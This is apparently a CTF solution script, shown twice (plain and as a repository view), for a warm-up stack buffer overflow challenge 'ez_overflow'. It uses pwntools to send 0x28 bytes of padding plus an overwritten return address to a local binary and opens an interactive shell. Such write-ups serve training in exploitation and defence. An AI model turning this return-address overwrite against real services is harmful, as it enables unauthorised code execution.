QWXFB-2024/热身赛/Pwn/ez_overflow/exp.py

#!/usr/bin/python3
from pwn import *

filename = "./pwn"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
host = 'localhost'
port = 7777
elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
    libc = ELF(libcname)
gs = '''
b main
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript = gs)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process(elf.path)

p = start()

p.sendline(b'a'*0x28 + p64(0x4011f6))

p.interactive()
Initial 2024-09-16 11:35:04 +08:00			`#!/usr/bin/python3`
			`from pwn import *`

			`filename = "./pwn"`
			`libcname = "/lib/x86_64-linux-gnu/libc.so.6"`
			`host = 'localhost'`
			`port = 7777`
			`elf = context.binary = ELF(filename)`
			`context.terminal = ['tmux', 'neww']`
			`if libcname:`
			`libc = ELF(libcname)`
			`gs = '''`
			`b main`
			`'''`

			`def start():`
			`if args.GDB:`
			`return gdb.debug(elf.path, gdbscript = gs)`
			`elif args.REMOTE:`
			`return remote(host, port)`
			`else:`
			`return process(elf.path)`

			`p = start()`

			`p.sendline(b'a'*0x28 + p64(0x4011f6))`

			`p.interactive()`